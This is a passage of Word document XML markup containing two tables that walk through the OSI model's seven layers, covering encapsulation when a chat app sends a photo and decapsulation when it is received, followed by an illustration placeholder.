          <w:p w14:paraId="62C72B27" w14:textId="1600DE3E" w:rsidR="005F16ED" w:rsidRPr="005F16ED" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F16ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">When </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>y</w:t>
            </w:r>
            <w:r w:rsidRPr="005F16ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="005F16ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">end </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="005F16ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ata (Encap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6715"/>
            </w:tblGrid>
            <w:tr w:rsidR="005F16ED" w:rsidRPr="00964C0E" w14:paraId="5A93F265" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="1D8E0AF5" w14:textId="7A868181" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Application (</w:t>
                  </w:r>
                  <w:r w:rsidR="00964C0E" w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>L</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>7)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="6D47123F" w14:textId="1C48F123" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Your chat app prepares the image for sending.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005F16ED" w:rsidRPr="00964C0E" w14:paraId="2EE22D92" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="78C7021A" w14:textId="1DED1139" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Presentation (</w:t>
                  </w:r>
                  <w:r w:rsidR="00964C0E" w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>L</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>6)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="05A8917D" w14:textId="7ECC5F85" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>The image is compressed and encrypted (e.g., TLS).</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005F16ED" w:rsidRPr="00964C0E" w14:paraId="10D40EE4" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="35FB069E" w14:textId="15E03B4C" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Session (</w:t>
                  </w:r>
                  <w:r w:rsidR="00964C0E" w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>L5</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="7A39A74C" w14:textId="401D2E37" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>A session is established between you and your friend’s device.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005F16ED" w:rsidRPr="00964C0E" w14:paraId="4EA055DD" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="324BF31B" w14:textId="1303DB65" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Transport (</w:t>
                  </w:r>
                  <w:r w:rsidR="00964C0E" w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>L</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>4)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="26BA2814" w14:textId="30D6A84A" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>TCP breaks the image into segments, numbers them, and adds port info.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005F16ED" w:rsidRPr="00964C0E" w14:paraId="09B63ACB" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="780AEDE0" w14:textId="4575FBC4" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Network (</w:t>
                  </w:r>
                  <w:r w:rsidR="00964C0E" w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>L</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>3)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="5654AE79" w14:textId="300E87B5" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Each segment gets an IP header with source and destination IPs.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005F16ED" w:rsidRPr="00964C0E" w14:paraId="048D2CEC" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2EFA2143" w14:textId="1E46BD17" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Data Link (</w:t>
                  </w:r>
                  <w:r w:rsidR="00964C0E" w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>L</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>2)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="4CDAE4ED" w14:textId="3A845E68" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>The IP packet is wrapped in a frame with MAC addresses.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005F16ED" w:rsidRPr="00964C0E" w14:paraId="02CB26CB" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="1518DECE" w14:textId="4E77C0F9" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Physical (</w:t>
                  </w:r>
                  <w:r w:rsidR="00964C0E" w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>L</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>1)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="76284AD1" w14:textId="70BB5F5B" w:rsidR="005F16ED" w:rsidRPr="00964C0E" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>The frame is converted into electrical signals, light pulses, or radio waves and sent over the medium.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="300E3E2A" w14:textId="5E9DE580" w:rsidR="005F16ED" w:rsidRPr="005F16ED" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AEC62FB" w14:textId="56ECECB6" w:rsidR="005F16ED" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F16ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">When </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>y</w:t>
            </w:r>
            <w:r w:rsidRPr="005F16ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="005F16ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">eceive </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="005F16ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ata (Decap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6715"/>
            </w:tblGrid>
            <w:tr w:rsidR="00964C0E" w:rsidRPr="00964C0E" w14:paraId="6D5E98C5" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="444C7842" w14:textId="77777777" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Physical (L1)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="44AE4A20" w14:textId="74D7B9CA" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Your NIC receives the raw signals.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00964C0E" w:rsidRPr="00964C0E" w14:paraId="0AA97361" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="6CBB4F30" w14:textId="37423656" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Data Link (L2)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="68D9E816" w14:textId="0775EDE7" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>It checks the MAC address and error detection bits.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00964C0E" w:rsidRPr="00964C0E" w14:paraId="4E9B2EC9" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="1C3FF02E" w14:textId="6879BB34" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Network (L3)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="5BEDD898" w14:textId="479CC61A" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>It reads the IP header to see if the packet is for you.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00964C0E" w:rsidRPr="00964C0E" w14:paraId="44C487C1" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="20E39182" w14:textId="0692FA67" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Transport (L4)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="5551F8D9" w14:textId="03EE44B2" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>TCP reassembles the segments in order and checks for missing ones.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00964C0E" w:rsidRPr="00964C0E" w14:paraId="698F68A5" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="07B3854F" w14:textId="474DDF00" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Session (L5)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="0D0DE824" w14:textId="72D6207A" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>The session context ensures the data belongs to the correct conversation.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00964C0E" w:rsidRPr="00964C0E" w14:paraId="63C70E21" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2C3572AB" w14:textId="7FDC350E" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Presentation (L6)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="197CCCBC" w14:textId="31FD9825" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>The data is decrypted and decompressed.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00964C0E" w:rsidRPr="00964C0E" w14:paraId="6459D081" w14:textId="77777777" w:rsidTr="00964C0E">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1807" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="3875CC19" w14:textId="36017660" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Application (L7)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6715" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="1A23A411" w14:textId="3568AD59" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00964C0E">
                    <w:rPr>
                      <w:sz w:val="22"/>
                    </w:rPr>
                    <w:t>Your chat app displays the photo.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2D73A3FB" w14:textId="10F27C31" w:rsidR="005F16ED" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1423A0B7" w14:textId="4F85466B" w:rsidR="00964C0E" w:rsidRPr="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964C0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Illustration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0DF612" w14:textId="60521EF5" w:rsidR="00964C0E" w:rsidRDefault="00964C0E" w:rsidP="00964C0E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="371F1130" wp14:editId="69037850">
            <wp:extent cx="7474144" cy="5348172"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1045930109"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89414" cy="5359098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
